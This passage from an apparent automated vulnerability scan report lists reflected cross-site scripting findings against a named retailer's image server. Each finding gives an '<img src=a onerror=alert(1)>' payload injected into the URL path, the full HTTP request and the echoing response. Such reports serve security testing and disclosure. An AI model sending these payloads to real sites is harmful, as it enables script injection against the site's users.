The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 24426<img%20src%3da%20onerror%3dalert(1)>eb76c2b7d07 was submitted in the REST URL parameter 4. This input was echoed as 24426<img src=a onerror=alert(1)>eb76c2b7d07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_ElectricBar224426<img%20src%3da%20onerror%3dalert(1)>eb76c2b7d07?$img_gif$&hei=20&wid=111&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 90
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:24 GMT
Connection: close

Unable to find /pacsun/detailLogo_ElectricBar224426<img src=a onerror=alert(1)>eb76c2b7d07

3.86. http://images3.pacsun.com/is/image/pacsun/detailLogo_F01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_F01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fcae1<img%20src%3da%20onerror%3dalert(1)>20c237af538 was submitted in the REST URL parameter 4. This input was echoed as fcae1<img src=a onerror=alert(1)>20c237af538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_F01fcae1<img%20src%3da%20onerror%3dalert(1)>20c237af538?$img_gif$&hei=20&wid=120&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:43 GMT
Connection: close

Unable to find /pacsun/detailLogo_F01fcae1<img src=a onerror=alert(1)>20c237af538

3.87. http://images3.pacsun.com/is/image/pacsun/detailLogo_I03 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_I03

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be7d9<img%20src%3da%20onerror%3dalert(1)>5e6ae0f073c was submitted in the REST URL parameter 4. This input was echoed as be7d9<img src=a onerror=alert(1)>5e6ae0f073c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_I03be7d9<img%20src%3da%20onerror%3dalert(1)>5e6ae0f073c?$img_gif$&hei=20&wid=18&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:30 GMT
Connection: close

Unable to find /pacsun/detailLogo_I03be7d9<img src=a onerror=alert(1)>5e6ae0f073c

3.88. http://images3.pacsun.com/is/image/pacsun/detailLogo_J02 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_J02

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d09f<img%20src%3da%20onerror%3dalert(1)>4bc9fdbe473 was submitted in the REST URL parameter 4. This input was echoed as 7d09f<img src=a onerror=alert(1)>4bc9fdbe473 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_J027d09f<img%20src%3da%20onerror%3dalert(1)>4bc9fdbe473?$img_gif$&hei=20&wid=40&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:31 GMT
Connection: close

Unable to find /pacsun/detailLogo_J027d09f<img src=a onerror=alert(1)>4bc9fdbe473

3.89. http://images3.pacsun.com/is/image/pacsun/detailLogo_L01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_L01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 679b6<img%20src%3da%20onerror%3dalert(1)>45652ca7449 was submitted in the REST URL parameter 4. This input was echoed as 679b6<img src=a onerror=alert(1)>45652ca7449 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_L01679b6<img%20src%3da%20onerror%3dalert(1)>45652ca7449?$img_gif$&hei=20&wid=57&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:38 GMT
Connection: close

Unable to find /pacsun/detailLogo_L01679b6<img src=a onerror=alert(1)>45652ca7449

3.90. http://images3.pacsun.com/is/image/pacsun/detailLogo_L03 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_L03

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb519<img%20src%3da%20onerror%3dalert(1)>1304a011ff5 was submitted in the REST URL parameter 4. This input was echoed as cb519<img src=a onerror=alert(1)>1304a011ff5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_L03cb519<img%20src%3da%20onerror%3dalert(1)>1304a011ff5?$img_gif$&hei=20&wid=88&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:40 GMT
Connection: close

Unable to find /pacsun/detailLogo_L03cb519<img src=a onerror=alert(1)>1304a011ff5

3.91. http://images3.pacsun.com/is/image/pacsun/detailLogo_L04 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_L04

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 557cd<img%20src%3da%20onerror%3dalert(1)>74814746684 was submitted in the REST URL parameter 4. This input was echoed as 557cd<img src=a onerror=alert(1)>74814746684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_L04557cd<img%20src%3da%20onerror%3dalert(1)>74814746684?$img_gif$&hei=20&wid=124&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:38 GMT
Connection: close

Unable to find /pacsun/detailLogo_L04557cd<img src=a onerror=alert(1)>74814746684

3.92. http://images3.pacsun.com/is/image/pacsun/detailLogo_M01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_M01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97b00<img%20src%3da%20onerror%3dalert(1)>76e1c38304b was submitted in the REST URL parameter 4. This input was echoed as 97b00<img src=a onerror=alert(1)>76e1c38304b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_M0197b00<img%20src%3da%20onerror%3dalert(1)>76e1c38304b?$img_gif$&hei=20&wid=30&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:42 GMT
Connection: close

Unable to find /pacsun/detailLogo_M0197b00<img src=a onerror=alert(1)>76e1c38304b

3.93. http://images3.pacsun.com/is/image/pacsun/detailLogo_M03 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_M03

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a39a<img%20src%3da%20onerror%3dalert(1)>4a9a17b5739 was submitted in the REST URL parameter 4. This input was echoed as 8a39a<img src=a onerror=alert(1)>4a9a17b5739 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_M038a39a<img%20src%3da%20onerror%3dalert(1)>4a9a17b5739?$img_gif$&hei=20&wid=28&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:29 GMT
Connection: close

Unable to find /pacsun/detailLogo_M038a39a<img src=a onerror=alert(1)>4a9a17b5739

3.94. http://images3.pacsun.com/is/image/pacsun/detailLogo_M04 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_M04

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 51ab9<img%20src%3da%20onerror%3dalert(1)>07b684bf62e was submitted in the REST URL parameter 4. This input was echoed as 51ab9<img src=a onerror=alert(1)>07b684bf62e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_M0451ab9<img%20src%3da%20onerror%3dalert(1)>07b684bf62e?$img_gif$&hei=20&wid=53&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:38 GMT
Connection: close

Unable to find /pacsun/detailLogo_M0451ab9<img src=a onerror=alert(1)>07b684bf62e

3.95. http://images3.pacsun.com/is/image/pacsun/detailLogo_M05 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_M05

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 87f41<img%20src%3da%20onerror%3dalert(1)>344f1a56de0 was submitted in the REST URL parameter 4. This input was echoed as 87f41<img src=a onerror=alert(1)>344f1a56de0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_M0587f41<img%20src%3da%20onerror%3dalert(1)>344f1a56de0?$img_gif$&hei=20&wid=134&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:33 GMT
Connection: close

Unable to find /pacsun/detailLogo_M0587f41<img src=a onerror=alert(1)>344f1a56de0

3.96. http://images3.pacsun.com/is/image/pacsun/detailLogo_M06 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_M06

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b73a8<img%20src%3da%20onerror%3dalert(1)>a869a660e67 was submitted in the REST URL parameter 4. This input was echoed as b73a8<img src=a onerror=alert(1)>a869a660e67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_M06b73a8<img%20src%3da%20onerror%3dalert(1)>a869a660e67?$img_gif$&hei=20&wid=104&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:46 GMT
Connection: close

Unable to find /pacsun/detailLogo_M06b73a8<img src=a onerror=alert(1)>a869a660e67

3.97. http://images3.pacsun.com/is/image/pacsun/detailLogo_O01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_O01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16c8f<img%20src%3da%20onerror%3dalert(1)>ebbc796eaf3 was submitted in the REST URL parameter 4. This input was echoed as 16c8f<img src=a onerror=alert(1)>ebbc796eaf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_O0116c8f<img%20src%3da%20onerror%3dalert(1)>ebbc796eaf3?$img_gif$&hei=20&wid=55&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:34 GMT
Connection: close

Unable to find /pacsun/detailLogo_O0116c8f<img src=a onerror=alert(1)>ebbc796eaf3

3.98. http://images3.pacsun.com/is/image/pacsun/detailLogo_S01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_S01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 56b0a<img%20src%3da%20onerror%3dalert(1)>9b1e6a14d99 was submitted in the REST URL parameter 4. This input was echoed as 56b0a<img src=a onerror=alert(1)>9b1e6a14d99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_S0156b0a<img%20src%3da%20onerror%3dalert(1)>9b1e6a14d99?$img_gif$&hei=20&wid=100&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 81
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:43 GMT
Connection: close

Unable to find /pacsun/detailLogo_S0156b0a<img src=a onerror=alert(1)>9b1e6a14d99

3.99. http://images3.pacsun.com/is/image/pacsun/detailLogo_VolcomBar [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/detailLogo_VolcomBar

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 60e50<img%20src%3da%20onerror%3dalert(1)>105ed31e3a1 was submitted in the REST URL parameter 4. This input was echoed as 60e50<img src=a onerror=alert(1)>105ed31e3a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/detailLogo_VolcomBar60e50<img%20src%3da%20onerror%3dalert(1)>105ed31e3a1?$img_gif$&hei=20&wid=70&op_saturation=-100&op_colorize=60,60,60,off,100 HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 87
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:26 GMT
Connection: close

Unable to find /pacsun/detailLogo_VolcomBar60e50<img src=a onerror=alert(1)>105ed31e3a1

3.100. http://images3.pacsun.com/is/image/pacsun/headerEmailV3_envelope [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/headerEmailV3_envelope

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82005<img%20src%3da%20onerror%3dalert(1)>f7417a937a was submitted in the REST URL parameter 4. This input was echoed as 82005<img src=a onerror=alert(1)>f7417a937a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

